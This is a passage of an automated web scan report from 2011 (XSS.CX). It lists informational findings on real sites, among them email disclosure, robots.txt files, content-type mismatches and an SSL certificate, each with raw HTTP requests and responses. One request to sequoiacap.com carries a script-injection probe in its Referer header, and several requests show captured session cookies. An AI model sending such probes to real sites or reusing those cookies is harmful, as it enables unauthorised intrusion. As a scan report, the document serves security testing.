The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
15.1. http://www.codecademy.com/assets/application.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/assets/application.js
Issue detail
The following email address was disclosed in the response:
Request
GET /assets/application.js?1320772907 HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/ Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:31:39 GMT Content-Type: application/javascript Connection: keep-alive Last-Modified: Tue, 08 Nov 2011 17:21:47 GMT Cache-Control: public, max-age=43200 X-Varnish: 2242468456 Age: 0 Via: 1.1 varnish CF-Cache-Status: HIT Vary: Accept-Encoding Expires: Thu, 10 Nov 2011 01:31:39 GMT Content-Length: 265624 /*! * jQuery JavaScript Library v1.6.2 * http://jquery.com/ * * Copyright 2011, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz...[SNIP]... </a>"}if($("#invite_request_form").length>0){message+='\n\nWant to hear about new courses and features? Type the following, replacing "user@email.com " with your email: <code>var email = "user@email.com ";</code>...[SNIP]...
15.2. http://www.mongodb.org/display/DOCS/Home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/display/DOCS/Home
Issue detail
The following email address was disclosed in the response:
Request
GET /display/DOCS/Home HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:03:20 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1320843800585 Vary: User-Agent Content-Type: text/html;charset=UTF-8 Content-Length: 37810 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Home - MongoDB</title> ...[SNIP]... <a href="mailto:docs@10gen.com ">docs@10gen.com </a>...[SNIP]...
15.3. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:jquery-base/com.atlassian.auiplugin:jquery-base.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:jquery-base/com.atlassian.auiplugin:jquery-base.js
Issue detail
The following email addresses were disclosed in the response:brandon.aaron@gmail.com paul.bakaus@googlemail.com
Request
GET /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:jquery-base/com.atlassian.auiplugin:jquery-base.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/display/DOCS/Home Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/x-javascript;charset=UTF-8 Date: Wed, 09 Nov 2011 13:03:20 GMT Expires: Sat, 06 Nov 2021 13:03:20 GMT ETag: "1320755916000" X-xgen-cache: yes Last-Modified: Tue, 08 Nov 2011 12:38:36 GMT X-Cache-Info: caching Content-Length: 3598 jQuery.noConflict(); /* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com ) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net) * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses. * * $LastCha...[SNIP]...
15.4. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:prototype/confluence.web.resources:prototype.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/s/1627/3/1.0/_/download/batch/confluence.web.resources:prototype/confluence.web.resources:prototype.js
Issue detail
The following email address was disclosed in the response:
Request
GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:prototype/confluence.web.resources:prototype.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/display/DOCS/Home Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/x-javascript;charset=UTF-8 Date: Wed, 09 Nov 2011 13:03:20 GMT Expires: Sat, 06 Nov 2021 13:03:20 GMT ETag: "1320755916000" X-xgen-cache: yes Last-Modified: Tue, 08 Nov 2011 12:38:36 GMT X-Cache-Info: caching Content-Length: 37808 /* Prototype JavaScript framework, version 1.4.0_pre11 * (c) 2005 Sam Stephenson <sam@conio.net > * * THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff * against the sourc...[SNIP]...
15.5. http://www.sequoiacap.com/javascripts/sc.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/javascripts/sc.js
Issue detail
The following email address was disclosed in the response:
Request
GET /javascripts/sc.js?1320687361 HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sequoiacap.com/42fa0%3Cscript%3Ealert(/XSS/)%3C/script%3Ecf97f530072
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Wed, 09 Nov 2011 14:13:04 GMT Content-Type: application/x-javascript Last-Modified: Mon, 07 Nov 2011 17:36:01 GMT Connection: keep-alive Content-Length: 94715 /* * jQuery history plugin * * sample page: http://www.mikage.to/jquery/jquery_history.html * * Copyright (c) 2006-2009 Taku Sano (Mikage Sawatari) * Licensed under the MIT License: * http:/...[SNIP]... <haineault@gmail.com >...[SNIP]... <haineault@gmail.com >...[SNIP]...
16. Robots.txt file
previous
next
There are 4 instances of this issue:
Issue background
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index. The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
16.1. https://account.covestor.com/mirroring-account/join-trial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: account.covestor.com
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:41:05 GMT Server: COVESTOR Last-Modified: Fri, 01 Apr 2011 15:48:04 GMT Accept-Ranges: bytes Content-Length: 30 Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/plain User-agent: * Disallow: /api/
16.2. http://cm.g.doubleclick.net/pixel
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cm.g.doubleclick.net
Path:
/pixel
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: cm.g.doubleclick.net
Response
HTTP/1.0 200 OK Content-Type: text/plain Date: Wed, 09 Nov 2011 13:21:18 GMT Server: Cookie Matcher Cache-Control: private X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN User-Agent: * Disallow: / Noindex: /
16.3. http://www.gravatar.com/avatar.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.gravatar.com
Path:
/avatar.php
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.gravatar.com
Response
HTTP/1.1 200 OK Server: nginx Date: Wed, 09 Nov 2011 13:38:35 GMT Content-Type: text/plain Connection: close Content-Length: 99 Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT Accept-Ranges: bytes User-Agent: * Disallow: /*.json Disallow: /*.xml Disallow: /*.php Disallow: /*.vcf Disallow: /*.qr
16.4. http://www.magnify.net/media/site/P8TH6404Q1P6NBW1/local_style.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.magnify.net
Path:
/media/site/P8TH6404Q1P6NBW1/local_style.css
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.magnify.net
Response
HTTP/1.1 200 OK Server: Apache Content-Location: robots.txt.mason Vary: negotiate TCN: choice Content-Type: text/plain X-Magnify-URL-Class: modperl-cachable Content-Length: 23 Date: Wed, 09 Nov 2011 13:20:24 GMT X-Varnish: 1394907027 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS User-agent: * Allow: /
17. Cacheable HTTPS response
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue description
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:Cache-control: no-store Pragma: no-cache
Request
GET /mirroring-account/join-trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://covestor.com/ Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:41:03 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/ Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/ Expires: Wed, 09 Nov 2011 13:41:03 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24468 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]...
18. HTML does not specify charset
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.svangel.com
Path:
/
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters. In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1 .
Request
GET / HTTP/1.1 Host: www.svangel.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 09 Nov 2011 14:01:16 GMTContent-type: text/html Content-Length: 204 <html><head><title>SVANGEL.COM</title><meta name="keywords" content=""</head><frameset rows="100%", *" border="0" frameborder="0"><frame src="http://about.me/svangel" name="SVANGEL.COM"></frameset></h...[SNIP]...
19. Content type incorrectly stated
previous
next
There are 6 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
19.1. http://harvardbusinessreview-www.baynote.net/baynote/tags3/common
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://harvardbusinessreview-www.baynote.net
Path:
/baynote/tags3/common
Issue detail
The response contains the following Content-type statement:Content-Type: text/javascript;charset=ISO-8859-1 The response states that it contains script . However, it actually appears to contain HTML .
Request
GET /baynote/tags3/common?customerId=harvardbusinessreview&code=www&timeout=undefined&onFailure=undefined HTTP/1.1 Host: harvardbusinessreview-www.baynote.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10
Response
HTTP/1.1 200 OK Server: BNServer Cache-Control: public,max-age=27800,must-revalidateContent-Type: text/javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Wed, 09 Nov 2011 14:09:35 GMT Content-Length: 80890 baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc...[SNIP]...
19.2. http://hbr.org/hbrg-main/resources/images/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/favicon.ico
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=UTF-8 The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /hbrg-main/resources/images/favicon.ico HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:15 GMT ETag: "67ec0-57e-4a888798ac9c0" Accept-Ranges: bytes Content-Length: 1406 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT LEG: 5Content-Type: text/plain; charset=UTF-8 ..............h.......(....... ...............................q\......>!...................v......!........................................................................................................[SNIP]...
19.3. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://hbr.org
Path:
/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=UTF-8 The response states that it contains plain text . However, it actually appears to contain CSS .
Request
GET /service/restv1/most-popular/daily/most_hbr/10/mostResphdlr?_=1320847772502 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:37 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5Content-Type: text/plain; charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:37 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 1466 mostResphdlr([{"pageUrl":"http://blogs.hbr.org/schwartz/2011/11/four-destructive-myths-most-co.html","pageTitle":"Four Destructive Myths Most Companies Still Live By - Tony Schwartz - Harvard Business...[SNIP]...
19.4. http://www.mongodb.org/json/contentnamesearch.action
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/json/contentnamesearch.action
Issue detail
The response contains the following Content-type statement:Content-Type: application/javascript;charset=UTF-8 The response states that it contains script . However, it actually appears to contain unrecognised content .
Request
GET /json/contentnamesearch.action?query=sq HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: application/json, text/javascript, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.mongodb.org/display/DOCS/Source+Code Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.4.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:03:44 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1320843824337 Vary: User-AgentContent-Type: application/javascript;charset=UTF-8 Content-Length: 1799 {"queryTokens":["sq"],"contentNameMatches":[[{"icon":null,"spaceName":"MongoDB","name":"SQL to Mongo Mapping Chart","spaceKey":"DOCS","className":"content-type-page","href":"/display/DOCS/SQL+to+Mongo...[SNIP]...
19.5. http://www.mongodb.org/plugins/pagetree/naturalchildren.action
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/plugins/pagetree/naturalchildren.action
Issue detail
The response contains the following Content-type statement:Content-Type: text/html;charset=UTF-8 The response states that it contains HTML . However, it actually appears to contain XML .
Request
GET /plugins/pagetree/naturalchildren.action?decorator=none&excerpt=false&sort=position&reverse=false&disableLinks=false&hasRoot=true&pageId=131081&treeId=0&startDepth=0&ancestors=131081 HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.mongodb.org/display/DOCS/Home Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.2.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:03:25 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1320843805398 Vary: User-AgentContent-Type: text/html;charset=UTF-8 Content-Length: 10676 <ul class="plugin_pagetree_children_list" id="child_ul131081-0"> <li> <div class="plugin_pagetree_childtoggle_container"> <img border="0" src="/images/icons/tree_s...[SNIP]...
19.6. http://www.mongodb.org/try/js/lib/query.js
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/lib/query.js
Issue detail
The response contains the following Content-type statement:Content-Type: text/html;charset=utf-8 The response states that it contains HTML . However, it actually appears to contain XML .
Request
GET /try/js/lib/query.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 404 Not Found Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding X-Cascade: pass Cache-Control: max-age=3600Content-Type: text/html;charset=utf-8 X-xgen-cache: yes Connection: keep-alive Set-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ X-Cache-Info: caching Content-Length: 18 <h1>Not Found</h1>
20. SSL certificate
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.covestor.com Issued by: RapidSSL CA Valid from: Mon Feb 21 00:50:21 CST 2011 Valid to: Sun Mar 25 04:08:52 CDT 2012
Certificate chain #1 Issued to: RapidSSL CA Issued by: GeoTrust Global CA Valid from: Fri Feb 19 16:45:05 CST 2010 Valid to: Tue Feb 18 16:45:05 CST 2020
Certificate chain #2 Issued to: GeoTrust Global CA Issued by: GeoTrust Global CA Valid from: Mon May 20 23:00:00 CDT 2002 Valid to: Fri May 20 23:00:00 CDT 2022
Issue background
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed. It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
Report generated by XSS.CX at Wed Nov 09 16:36:58 CST 2011.